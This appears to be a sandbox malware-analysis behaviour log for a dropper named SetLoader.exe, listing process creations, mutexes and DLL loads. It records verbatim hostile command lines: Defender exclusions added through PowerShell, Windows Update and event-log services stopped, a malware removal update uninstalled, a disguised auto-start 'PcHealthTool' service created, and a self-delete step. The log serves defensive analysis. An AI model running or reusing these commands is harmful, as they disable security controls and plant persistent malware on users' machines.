              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3544:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeMutant created: \Sessions\1\BaseNamedObjects\My_Program_Already_Present
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6700:120:WilError_03
              Source: C:\Windows\System32\dwm.exeMutant created: \BaseNamedObjects\Global\ubhtovowrnkkphnn
              Source: C:\Users\user\Desktop\SetLoader.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: sfxname0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: sfxstime0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: pPe0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: STARTDLG0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: >Gd0_2_00644690
              Source: SetLoader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\SetLoader.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: SetLoader.exeVirustotal: Detection: 18%
              Source: C:\Users\user\Desktop\SetLoader.exeFile read: C:\Users\user\Desktop\SetLoader.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SetLoader.exe "C:\Users\user\Desktop\SetLoader.exe"
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe"
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PcHealthTool"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PcHealthTool"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe"
              Source: unknownProcess created: C:\ProgramData\PcHealthTool\HealthTool.exe C:\ProgramData\PcHealthTool\HealthTool.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe" Jump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" Jump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PcHealthTool"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PcHealthTool"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: wintypes.dllJump to behavior
